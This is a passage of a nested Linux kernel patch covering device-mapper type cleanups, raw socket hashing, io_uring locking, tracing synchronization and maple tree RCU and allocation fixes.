++dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++		       unsigned int reserved_buffers, unsigned int aux_size,
+ 		       void (*alloc_callback)(struct dm_buffer *),
+ 		       void (*write_callback)(struct dm_buffer *),
+ 		       unsigned int flags);
+@@ -81,7 +81,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+  * I/O to finish.
+  */
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks);
++		       sector_t block, unsigned int n_blocks);
+ 
+ /*
+  * Release a reference obtained with dm_bufio_{read,get,new}. The data
+@@ -106,7 +106,7 @@ void dm_bufio_mark_buffer_dirty(struct dm_buffer *b);
+  * write the specified part of the buffer or it may write a larger superset.
+  */
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end);
++					unsigned int start, unsigned int end);
+ 
+ /*
+  * Initiate writing of dirty buffers, without waiting for completion.
+@@ -152,9 +152,9 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ /*
+  * Set the minimum number of buffers before cleanup happens.
+  */
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n);
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c);
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_device_size(struct dm_bufio_client *c);
+ struct dm_io_client *dm_bufio_get_dm_io_client(struct dm_bufio_client *c);
+ sector_t dm_bufio_get_block_number(struct dm_buffer *b);
+diff --git a/include/linux/dm-dirty-log.h b/include/linux/dm-dirty-log.h
+index 7084503c3405f..843c857f07b0d 100644
+--- a/include/linux/dm-dirty-log.h
++++ b/include/linux/dm-dirty-log.h
+@@ -33,7 +33,7 @@ struct dm_dirty_log_type {
+ 	struct list_head list;
+ 
+ 	int (*ctr)(struct dm_dirty_log *log, struct dm_target *ti,
+-		   unsigned argc, char **argv);
++		   unsigned int argc, char **argv);
+ 	void (*dtr)(struct dm_dirty_log *log);
+ 
+ 	/*
+@@ -116,7 +116,7 @@ struct dm_dirty_log_type {
+ 	 * Support function for mirror status requests.
+ 	 */
+ 	int (*status)(struct dm_dirty_log *log, status_type_t status_type,
+-		      char *result, unsigned maxlen);
++		      char *result, unsigned int maxlen);
+ 
+ 	/*
+ 	 * is_remote_recovering is necessary for cluster mirroring. It provides
+@@ -139,7 +139,7 @@ int dm_dirty_log_type_unregister(struct dm_dirty_log_type *type);
+ struct dm_dirty_log *dm_dirty_log_create(const char *type_name,
+ 			struct dm_target *ti,
+ 			int (*flush_callback_fn)(struct dm_target *ti),
+-			unsigned argc, char **argv);
++			unsigned int argc, char **argv);
+ void dm_dirty_log_destroy(struct dm_dirty_log *log);
+ 
+ #endif	/* __KERNEL__ */
+diff --git a/include/linux/dm-io.h b/include/linux/dm-io.h
+index 8e1c4ab5df043..92e7abfe04f92 100644
+--- a/include/linux/dm-io.h
++++ b/include/linux/dm-io.h
+@@ -26,7 +26,7 @@ struct page_list {
+ 	struct page *page;
+ };
+ 
+-typedef void (*io_notify_fn)(unsigned long error, void *context);
++typedef void (*io_notify_fn)(unsigned int long error, void *context);
+ 
+ enum dm_io_mem_type {
+ 	DM_IO_PAGE_LIST,/* Page list */
+@@ -38,7 +38,7 @@ enum dm_io_mem_type {
+ struct dm_io_memory {
+ 	enum dm_io_mem_type type;
+ 
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	union {
+ 		struct page_list *pl;
+@@ -78,8 +78,8 @@ void dm_io_client_destroy(struct dm_io_client *client);
+  * Each bit in the optional 'sync_error_bits' bitset indicates whether an
+  * error occurred doing io to the corresponding region.
+  */
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
+-	  struct dm_io_region *region, unsigned long *sync_error_bits);
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
++	  struct dm_io_region *region, unsigned int long *sync_error_bits);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_IO_H */
+diff --git a/include/linux/dm-kcopyd.h b/include/linux/dm-kcopyd.h
+index c1707ee5b5408..68c412b31b788 100644
+--- a/include/linux/dm-kcopyd.h
++++ b/include/linux/dm-kcopyd.h
+@@ -23,11 +23,11 @@
+ #define DM_KCOPYD_WRITE_SEQ    2
+ 
+ struct dm_kcopyd_throttle {
+-	unsigned throttle;
+-	unsigned num_io_jobs;
+-	unsigned io_period;
+-	unsigned total_period;
+-	unsigned last_jiffies;
++	unsigned int throttle;
++	unsigned int num_io_jobs;
++	unsigned int io_period;
++	unsigned int total_period;
++	unsigned int last_jiffies;
+ };
+ 
+ /*
+@@ -60,12 +60,12 @@ void dm_kcopyd_client_flush(struct dm_kcopyd_client *kc);
+  * read_err is a boolean,
+  * write_err is a bitset, with 1 bit for each destination region
+  */
+-typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned long write_err,
++typedef void (*dm_kcopyd_notify_fn)(int read_err, unsigned int long write_err,
+ 				    void *context);
+ 
+ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ /*
+  * Prepare a callback and submit it via the kcopyd thread.
+@@ -80,11 +80,11 @@ void dm_kcopyd_copy(struct dm_kcopyd_client *kc, struct dm_io_region *from,
+  */
+ void *dm_kcopyd_prepare_callback(struct dm_kcopyd_client *kc,
+ 				 dm_kcopyd_notify_fn fn, void *context);
+-void dm_kcopyd_do_callback(void *job, int read_err, unsigned long write_err);
++void dm_kcopyd_do_callback(void *job, int read_err, unsigned int long write_err);
+ 
+ void dm_kcopyd_zero(struct dm_kcopyd_client *kc,
+-		    unsigned num_dests, struct dm_io_region *dests,
+-		    unsigned flags, dm_kcopyd_notify_fn fn, void *context);
++		    unsigned int num_dests, struct dm_io_region *dests,
++		    unsigned int flags, dm_kcopyd_notify_fn fn, void *context);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_KCOPYD_H */
+diff --git a/include/linux/dm-region-hash.h b/include/linux/dm-region-hash.h
+index 9e2a7a401df50..e8691539e1d77 100644
+--- a/include/linux/dm-region-hash.h
++++ b/include/linux/dm-region-hash.h
+@@ -37,7 +37,7 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions);
+ void dm_region_hash_destroy(struct dm_region_hash *rh);
+diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
+index 62557d4bffc2b..8128059db5ed7 100644
+--- a/include/linux/ftrace.h
++++ b/include/linux/ftrace.h
+@@ -943,7 +943,7 @@ static inline void __ftrace_enabled_restore(int enabled)
+ #define CALLER_ADDR5 ((unsigned long)ftrace_return_address(5))
+ #define CALLER_ADDR6 ((unsigned long)ftrace_return_address(6))
+ 
+-static inline unsigned long get_lock_parent_ip(void)
++static __always_inline unsigned long get_lock_parent_ip(void)
+ {
+ 	unsigned long addr = CALLER_ADDR0;
+ 
+diff --git a/include/linux/mm_types.h b/include/linux/mm_types.h
+index 500e536796ca4..247aedb18d5c3 100644
+--- a/include/linux/mm_types.h
++++ b/include/linux/mm_types.h
+@@ -725,7 +725,8 @@ struct mm_struct {
+ 	unsigned long cpu_bitmap[];
+ };
+ 
+-#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN)
++#define MM_MT_FLAGS	(MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN | \
++			 MT_FLAGS_USE_RCU)
+ extern struct mm_struct init_mm;
+ 
+ /* Pointer magic because the dynamic array size confuses some compilers. */
+diff --git a/include/linux/pci-doe.h b/include/linux/pci-doe.h
+index ed9b4df792b88..43765eaf2342c 100644
+--- a/include/linux/pci-doe.h
++++ b/include/linux/pci-doe.h
+@@ -34,6 +34,10 @@ struct pci_doe_mb;
+  * @work: Used internally by the mailbox
+  * @doe_mb: Used internally by the mailbox
+  *
++ * Payloads are treated as opaque byte streams which are transmitted verbatim,
++ * without byte-swapping.  If payloads contain little-endian register values,
++ * the caller is responsible for conversion with cpu_to_le32() / le32_to_cpu().
++ *
+  * The payload sizes and rv are specified in bytes with the following
+  * restrictions concerning the protocol.
+  *
+@@ -45,9 +49,9 @@ struct pci_doe_mb;
+  */
+ struct pci_doe_task {
+ 	struct pci_doe_protocol prot;
+-	u32 *request_pl;
++	__le32 *request_pl;
+ 	size_t request_pl_sz;
+-	u32 *response_pl;
++	__le32 *response_pl;
+ 	size_t response_pl_sz;
+ 	int rv;
+ 	void (*complete)(struct pci_doe_task *task);
+diff --git a/include/linux/phylink.h b/include/linux/phylink.h
+index 3f01ac8017e06..6d62c9ea2e040 100644
+--- a/include/linux/phylink.h
++++ b/include/linux/phylink.h
+@@ -566,6 +566,7 @@ struct phylink *phylink_create(struct phylink_config *, struct fwnode_handle *,
+ 			       phy_interface_t iface,
+ 			       const struct phylink_mac_ops *mac_ops);
+ void phylink_destroy(struct phylink *);
++bool phylink_expects_phy(struct phylink *pl);
+ 
+ int phylink_connect_phy(struct phylink *, struct phy_device *);
+ int phylink_of_phy_connect(struct phylink *, struct device_node *, u32 flags);
+diff --git a/include/linux/pwm.h b/include/linux/pwm.h
+index d70c6e5a839d6..4de09163c968a 100644
+--- a/include/linux/pwm.h
++++ b/include/linux/pwm.h
+@@ -276,8 +276,8 @@ struct pwm_ops {
+ 		       struct pwm_capture *result, unsigned long timeout);
+ 	int (*apply)(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		     const struct pwm_state *state);
+-	void (*get_state)(struct pwm_chip *chip, struct pwm_device *pwm,
+-			  struct pwm_state *state);
++	int (*get_state)(struct pwm_chip *chip, struct pwm_device *pwm,
++			 struct pwm_state *state);
+ 	struct module *owner;
+ };
+ 
+diff --git a/include/net/raw.h b/include/net/raw.h
+index 5e665934ebc7c..3af5289fdead9 100644
+--- a/include/net/raw.h
++++ b/include/net/raw.h
+@@ -15,6 +15,8 @@
+ 
+ #include <net/inet_sock.h>
+ #include <net/protocol.h>
++#include <net/netns/hash.h>
++#include <linux/hash.h>
+ #include <linux/icmp.h>
+ 
+ extern struct proto raw_prot;
+@@ -29,20 +31,27 @@ int raw_local_deliver(struct sk_buff *, int);
+ 
+ int raw_rcv(struct sock *, struct sk_buff *);
+ 
+-#define RAW_HTABLE_SIZE	MAX_INET_PROTOS
++#define RAW_HTABLE_LOG	8
++#define RAW_HTABLE_SIZE	(1U << RAW_HTABLE_LOG)
+ 
+ struct raw_hashinfo {
+ 	spinlock_t lock;
+-	struct hlist_nulls_head ht[RAW_HTABLE_SIZE];
++
++	struct hlist_head ht[RAW_HTABLE_SIZE] ____cacheline_aligned;
+ };
+ 
++static inline u32 raw_hashfunc(const struct net *net, u32 proto)
++{
++	return hash_32(net_hash_mix(net) ^ proto, RAW_HTABLE_LOG);
++}
++
+ static inline void raw_hashinfo_init(struct raw_hashinfo *hashinfo)
+ {
+ 	int i;
+ 
+ 	spin_lock_init(&hashinfo->lock);
+ 	for (i = 0; i < RAW_HTABLE_SIZE; i++)
+-		INIT_HLIST_NULLS_HEAD(&hashinfo->ht[i], i);
++		INIT_HLIST_HEAD(&hashinfo->ht[i]);
+ }
+ 
+ #ifdef CONFIG_PROC_FS
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index ce4969d3e20de..cc35aba1e4957 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2585,8 +2585,8 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
+ 	io_eventfd_unregister(ctx);
+ 	io_alloc_cache_free(&ctx->apoll_cache, io_apoll_cache_free);
+ 	io_alloc_cache_free(&ctx->netmsg_cache, io_netmsg_cache_free);
+-	mutex_unlock(&ctx->uring_lock);
+ 	io_destroy_buffers(ctx);
++	mutex_unlock(&ctx->uring_lock);
+ 	if (ctx->sq_creds)
+ 		put_cred(ctx->sq_creds);
+ 	if (ctx->submitter_task)
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 746b137b96e9b..acc37e5a6d4e1 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -228,17 +228,18 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
+ 		return i;
+ 	}
+ 
+-	/* the head kbuf is the list itself */
++	/* protects io_buffers_cache */
++	lockdep_assert_held(&ctx->uring_lock);
++
+ 	while (!list_empty(&bl->buf_list)) {
+ 		struct io_buffer *nxt;
+ 
+ 		nxt = list_first_entry(&bl->buf_list, struct io_buffer, list);
+-		list_del(&nxt->list);
++		list_move(&nxt->list, &ctx->io_buffers_cache);
+ 		if (++i == nbufs)
+ 			return i;
+ 		cond_resched();
+ 	}
+-	i++;
+ 
+ 	return i;
+ }
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 2aa286b4151b3..7699b99706ad4 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -12040,7 +12040,7 @@ perf_event_set_output(struct perf_event *event, struct perf_event *output_event)
+ 	/*
+ 	 * If its not a per-cpu rb, it must be the same task.
+ 	 */
+-	if (output_event->cpu == -1 && output_event->ctx != event->ctx)
++	if (output_event->cpu == -1 && output_event->hw.target != event->hw.target)
+ 		goto out;
+ 
+ 	/*
+diff --git a/kernel/fork.c b/kernel/fork.c
+index a6d243a50be3e..ec913b13c5edb 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -617,6 +617,7 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	if (retval)
+ 		goto out;
+ 
++	mt_clear_in_rcu(mas.tree);
+ 	mas_for_each(&old_mas, mpnt, ULONG_MAX) {
+ 		struct file *file;
+ 
+@@ -703,6 +704,8 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 	retval = arch_dup_mmap(oldmm, mm);
+ loop_out:
+ 	mas_destroy(&mas);
++	if (!retval)
++		mt_set_in_rcu(mas.tree);
+ out:
+ 	mmap_write_unlock(mm);
+ 	flush_tlb_mm(oldmm);
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 59062fedeaf7c..57db50c2dce80 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -5557,12 +5557,15 @@ int modify_ftrace_direct(unsigned long ip,
+ 		ret = 0;
+ 	}
+ 
+-	if (unlikely(ret && new_direct)) {
+-		direct->count++;
+-		list_del_rcu(&new_direct->next);
+-		synchronize_rcu_tasks();
+-		kfree(new_direct);
+-		ftrace_direct_func_count--;
++	if (ret) {
++		direct->addr = old_addr;
++		if (unlikely(new_direct)) {
++			direct->count++;
++			list_del_rcu(&new_direct->next);
++			synchronize_rcu_tasks();
++			kfree(new_direct);
++			ftrace_direct_func_count--;
++		}
+ 	}
+ 
+  out_unlock:
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 361bd8beafdff..9d8538531a545 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -3084,6 +3084,10 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 		if (RB_WARN_ON(cpu_buffer,
+ 			       rb_is_reader_page(cpu_buffer->tail_page)))
+ 			return;
++		/*
++		 * No need for a memory barrier here, as the update
++		 * of the tail_page did it for this page.
++		 */
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		rb_inc_page(&cpu_buffer->commit_page);
+@@ -3093,6 +3097,8 @@ rb_set_commit_to_write(struct ring_buffer_per_cpu *cpu_buffer)
+ 	while (rb_commit_index(cpu_buffer) !=
+ 	       rb_page_write(cpu_buffer->commit_page)) {
+ 
++		/* Make sure the readers see the content of what is committed. */
++		smp_wmb();
+ 		local_set(&cpu_buffer->commit_page->page->commit,
+ 			  rb_page_write(cpu_buffer->commit_page));
+ 		RB_WARN_ON(cpu_buffer,
+@@ -4672,7 +4678,12 @@ rb_get_reader_page(struct ring_buffer_per_cpu *cpu_buffer)
+ 
+ 	/*
+ 	 * Make sure we see any padding after the write update
+-	 * (see rb_reset_tail())
++	 * (see rb_reset_tail()).
++	 *
++	 * In addition, a writer may be writing on the reader page
++	 * if the page has not been fully filled, so the read barrier
++	 * is also needed to make sure we see the content of what is
++	 * committed by the writer (see rb_set_commit_to_write()).
+ 	 */
+ 	smp_rmb();
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 78d69b9488e45..78855e74e355f 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9470,6 +9470,7 @@ static int __remove_instance(struct trace_array *tr)
+ 	tracefs_remove(tr->dir);
+ 	free_percpu(tr->last_func_repeats);
+ 	free_trace_buffers(tr);
++	clear_tracing_err_log(tr);
+ 
+ 	for (i = 0; i < tr->nr_topts; i++) {
+ 		kfree(tr->topts[i].topts);
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index 67592eed0be8d..89083ae1aebe3 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -44,14 +44,21 @@ enum { ERRORS };
+ 
+ static const char *err_text[] = { ERRORS };
+ 
++static DEFINE_MUTEX(lastcmd_mutex);
+ static char *last_cmd;
+ 
+ static int errpos(const char *str)
+ {
++	int ret = 0;
++
++	mutex_lock(&lastcmd_mutex);
+ 	if (!str || !last_cmd)
+-		return 0;
++		goto out;
+ 
+-	return err_pos(last_cmd, str);
++	ret = err_pos(last_cmd, str);
++ out:
++	mutex_unlock(&lastcmd_mutex);
++	return ret;
+ }
+ 
+ static void last_cmd_set(const char *str)
+@@ -59,18 +66,22 @@ static void last_cmd_set(const char *str)
+ 	if (!str)
+ 		return;
+ 
++	mutex_lock(&lastcmd_mutex);
+ 	kfree(last_cmd);
+-
+ 	last_cmd = kstrdup(str, GFP_KERNEL);
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static void synth_err(u8 err_type, u16 err_pos)
+ {
++	mutex_lock(&lastcmd_mutex);
+ 	if (!last_cmd)
+-		return;
++		goto out;
+ 
+ 	tracing_log_err(NULL, "synthetic_events", last_cmd, err_text,
+ 			err_type, err_pos);
++ out:
++	mutex_unlock(&lastcmd_mutex);
+ }
+ 
+ static int create_synth_event(const char *raw_command);
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 1c07efcb3d466..689361097bb0c 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -1270,7 +1270,7 @@ static void notify_new_max_latency(u64 latency)
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(inst, &osnoise_instances, list) {
+ 		tr = inst->tr;
+-		if (tr->max_latency < latency) {
++		if (tracer_tracing_is_on(tr) && tr->max_latency < latency) {
+ 			tr->max_latency = latency;
+ 			latency_fsnotify(tr);
+ 		}
+@@ -1681,6 +1681,8 @@ static int timerlat_main(void *data)
+ 
+ 		trace_timerlat_sample(&s);
+ 
++		notify_new_max_latency(diff);
++
+ 		timerlat_dump_stack(time_to_us(diff));
+ 
+ 		tlat->tracing_thread = false;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 96be96a1f35dc..84530fb73bd9e 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -149,13 +149,12 @@ struct maple_subtree_state {
+ /* Functions */
+ static inline struct maple_node *mt_alloc_one(gfp_t gfp)
+ {
+-	return kmem_cache_alloc(maple_node_cache, gfp | __GFP_ZERO);
++	return kmem_cache_alloc(maple_node_cache, gfp);
+ }
+ 
+ static inline int mt_alloc_bulk(gfp_t gfp, size_t size, void **nodes)
+ {
+-	return kmem_cache_alloc_bulk(maple_node_cache, gfp | __GFP_ZERO, size,
+-				     nodes);
++	return kmem_cache_alloc_bulk(maple_node_cache, gfp, size, nodes);
+ }
+ 
+ static inline void mt_free_bulk(size_t size, void __rcu **nodes)
+@@ -530,11 +529,14 @@ static inline struct maple_node *mte_parent(const struct maple_enode *enode)
+  */
+ static inline bool ma_dead_node(const struct maple_node *node)
+ {
+-	struct maple_node *parent = (void *)((unsigned long)
+-					     node->parent & ~MAPLE_NODE_MASK);
++	struct maple_node *parent;
+ 
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
++	parent = (void *)((unsigned long) node->parent & ~MAPLE_NODE_MASK);
+ 	return (parent == node);
+ }
++
+ /*
+  * mte_dead_node() - check if the @enode is dead.
+  * @enode: The encoded maple node
+@@ -546,6 +548,8 @@ static inline bool mte_dead_node(const struct maple_enode *enode)
+ 	struct maple_node *parent, *node;
+ 
+ 	node = mte_to_node(enode);
++	/* Do not reorder reads from the node prior to the parent check */
++	smp_rmb();
+ 	parent = mte_parent(enode);
+ 	return (parent == node);
+ }
+@@ -616,6 +620,8 @@ static inline unsigned int mas_alloc_req(const struct ma_state *mas)
+  * @node - the maple node
+  * @type - the node type
+  *
++ * In the event of a dead node, this array may be %NULL
++ *
+  * Return: A pointer to the maple node pivots
+  */
+ static inline unsigned long *ma_pivots(struct maple_node *node,
+@@ -808,6 +814,11 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ 	return rcu_dereference_check(slots[offset], mt_locked(mt));
+ }
+ 
++static inline void *mt_slot_locked(struct maple_tree *mt, void __rcu **slots,
++				   unsigned char offset)
++{
++	return rcu_dereference_protected(slots[offset], mt_locked(mt));
++}
+ /*
+  * mas_slot_locked() - Get the slot value when holding the maple tree lock.
+  * @mas: The maple state
+@@ -819,7 +830,7 @@ static inline void *mt_slot(const struct maple_tree *mt,
+ static inline void *mas_slot_locked(struct ma_state *mas, void __rcu **slots,
+ 				       unsigned char offset)
+ {
+-	return rcu_dereference_protected(slots[offset], mt_locked(mas->tree));
++	return mt_slot_locked(mas->tree, slots, offset);
+ }
+ 
+ /*
+@@ -890,6 +901,45 @@ static inline void ma_set_meta(struct maple_node *mn, enum maple_type mt,
+ 	meta->end = end;
+ }
+ 
++/*
++ * mt_clear_meta() - clear the metadata information of a node, if it exists
++ * @mt: The maple tree
++ * @mn: The maple node
++ * @type: The maple node type
++ * @offset: The offset of the highest sub-gap in this node.
++ * @end: The end of the data in this node.
++ */
++static inline void mt_clear_meta(struct maple_tree *mt, struct maple_node *mn,
++				  enum maple_type type)
++{
++	struct maple_metadata *meta;
++	unsigned long *pivots;
++	void __rcu **slots;
++	void *next;
++
++	switch (type) {
++	case maple_range_64:
++		pivots = mn->mr64.pivot;
++		if (unlikely(pivots[MAPLE_RANGE64_SLOTS - 2])) {
++			slots = mn->mr64.slot;
++			next = mt_slot_locked(mt, slots,
++					      MAPLE_RANGE64_SLOTS - 1);
++			if (unlikely((mte_to_node(next) &&
++				      mte_node_type(next))))
++				return; /* no metadata, could be node */
++		}
++		fallthrough;
++	case maple_arange_64:
++		meta = ma_meta(mn, type);
++		break;
++	default:
++		return;
++	}
++
++	meta->gap = 0;
++	meta->end = 0;
++}
++
+ /*
+  * ma_meta_end() - Get the data end of a node from the metadata
+  * @mn: The maple node
+@@ -1087,8 +1137,11 @@ static int mas_ascend(struct ma_state *mas)
+ 		a_type = mas_parent_enum(mas, p_enode);
+ 		a_node = mte_parent(p_enode);
+ 		a_slot = mte_parent_slot(p_enode);
+-		pivots = ma_pivots(a_node, a_type);
+ 		a_enode = mt_mk_node(a_node, a_type);
++		pivots = ma_pivots(a_node, a_type);
++
++		if (unlikely(ma_dead_node(a_node)))
++			return 1;
+ 
+ 		if (!set_min && a_slot) {
+ 			set_min = true;
+@@ -1123,9 +1176,10 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ {
+ 	struct maple_alloc *ret, *node = mas->alloc;
+ 	unsigned long total = mas_allocated(mas);
++	unsigned int req = mas_alloc_req(mas);
+ 
+ 	/* nothing or a request pending. */
+-	if (unlikely(!total))
++	if (WARN_ON(!total))
+ 		return NULL;
+ 
+ 	if (total == 1) {
+@@ -1135,27 +1189,25 @@ static inline struct maple_node *mas_pop_node(struct ma_state *mas)
+ 		goto single_node;
+ 	}
+ 
+-	if (!node->node_count) {
++	if (node->node_count == 1) {
+ 		/* Single allocation in this node. */
+ 		mas->alloc = node->slot[0];
+-		node->slot[0] = NULL;
+ 		mas->alloc->total = node->total - 1;
+ 		ret = node;
+ 		goto new_head;
+ 	}
+-
+ 	node->total--;
+-	ret = node->slot[node->node_count];
+-	node->slot[node->node_count--] = NULL;
++	ret = node->slot[--node->node_count];
++	node->slot[node->node_count] = NULL;
+ 
+ single_node:
+ new_head:
+-	ret->total = 0;
+-	ret->node_count = 0;
+-	if (ret->request_count) {
+-		mas_set_alloc_req(mas, ret->request_count + 1);
+-		ret->request_count = 0;
++	if (req) {
++		req++;
++		mas_set_alloc_req(mas, req);
+ 	}
++
++	memset(ret, 0, sizeof(*ret));
+ 	return (struct maple_node *)ret;
+ }
+ 
+@@ -1174,21 +1226,20 @@ static inline void mas_push_node(struct ma_state *mas, struct maple_node *used)
+ 	unsigned long count;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 
+-	memset(reuse, 0, sizeof(*reuse));
+ 	count = mas_allocated(mas);
+ 
+-	if (count && (head->node_count < MAPLE_ALLOC_SLOTS - 1)) {
+-		if (head->slot[0])
+-			head->node_count++;
+-		head->slot[head->node_count] = reuse;
++	reuse->request_count = 0;
++	reuse->node_count = 0;
++	if (count && (head->node_count < MAPLE_ALLOC_SLOTS)) {
++		head->slot[head->node_count++] = reuse;
+ 		head->total++;
+ 		goto done;
+ 	}
+ 
+ 	reuse->total = 1;
+ 	if ((head) && !((unsigned long)head & 0x1)) {
+-		head->request_count = 0;
+ 		reuse->slot[0] = head;
++		reuse->node_count = 1;
+ 		reuse->total += head->total;
+ 	}
+ 
+@@ -1207,7 +1258,6 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ {
+ 	struct maple_alloc *node;
+ 	unsigned long allocated = mas_allocated(mas);
+-	unsigned long success = allocated;
+ 	unsigned int requested = mas_alloc_req(mas);
+ 	unsigned int count;
+ 	void **slots = NULL;
+@@ -1223,24 +1273,29 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 		WARN_ON(!allocated);
+ 	}
+ 
+-	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS - 1) {
++	if (!allocated || mas->alloc->node_count == MAPLE_ALLOC_SLOTS) {
+ 		node = (struct maple_alloc *)mt_alloc_one(gfp);
+ 		if (!node)
+ 			goto nomem_one;
+ 
+-		if (allocated)
++		if (allocated) {
+ 			node->slot[0] = mas->alloc;
++			node->node_count = 1;
++		} else {
++			node->node_count = 0;
++		}
+ 
+-		success++;
+ 		mas->alloc = node;
++		node->total = ++allocated;
+ 		requested--;
+ 	}
+ 
+ 	node = mas->alloc;
++	node->request_count = 0;
+ 	while (requested) {
+ 		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->slot[0]) {
+-			unsigned int offset = node->node_count + 1;
++		if (node->node_count) {
++			unsigned int offset = node->node_count;
+ 
+ 			slots = (void **)&node->slot[offset];
+ 			max_req -= offset;
+@@ -1254,15 +1309,13 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 			goto nomem_bulk;
+ 
+ 		node->node_count += count;
+-		/* zero indexed. */
+-		if (slots == (void **)&node->slot)
+-			node->node_count--;
+-
+-		success += count;
++		allocated += count;
+ 		node = node->slot[0];
++		node->node_count = 0;
++		node->request_count = 0;
+ 		requested -= count;
+ 	}
+-	mas->alloc->total = success;
++	mas->alloc->total = allocated;
+ 	return;
+ 
+ nomem_bulk:
+@@ -1271,7 +1324,7 @@ nomem_bulk:
+ nomem_one:
+ 	mas_set_alloc_req(mas, requested);
+ 	if (mas->alloc && !(((unsigned long)mas->alloc & 0x1)))
+-		mas->alloc->total = success;
++		mas->alloc->total = allocated;
+ 	mas_set_err(mas, -ENOMEM);
+ 	return;
+ 
+@@ -1329,7 +1382,7 @@ static void mas_node_count(struct ma_state *mas, int count)
+  * mas_start() - Sets up maple state for operations.
+  * @mas: The maple state.
+  *
+- * If mas->node == MAS_START, then set the min, max, depth, and offset to
++ * If mas->node == MAS_START, then set the min, max and depth to
+  * defaults.
+  *
+  * Return:
+@@ -1343,22 +1396,26 @@ static inline struct maple_enode *mas_start(struct ma_state *mas)
+ 	if (likely(mas_is_start(mas))) {
+ 		struct maple_enode *root;
+ 
+-		mas->node = MAS_NONE;
+ 		mas->min = 0;
+ 		mas->max = ULONG_MAX;
+ 		mas->depth = 0;
+-		mas->offset = 0;
+ 
++retry:
+ 		root = mas_root(mas);
+ 		/* Tree with nodes */
+ 		if (likely(xa_is_node(root))) {
+ 			mas->depth = 1;
+ 			mas->node = mte_safe_root(root);
++			mas->offset = 0;
++			if (mte_dead_node(mas->node))
++				goto retry;
++
+ 			return NULL;
+ 		}
+ 
+ 		/* empty tree */
+ 		if (unlikely(!root)) {
++			mas->node = MAS_NONE;
+ 			mas->offset = MAPLE_NODE_SLOTS;
+ 			return NULL;
+ 		}
+@@ -1394,6 +1451,9 @@ static inline unsigned char ma_data_end(struct maple_node *node,
+ {
+ 	unsigned char offset;
+ 
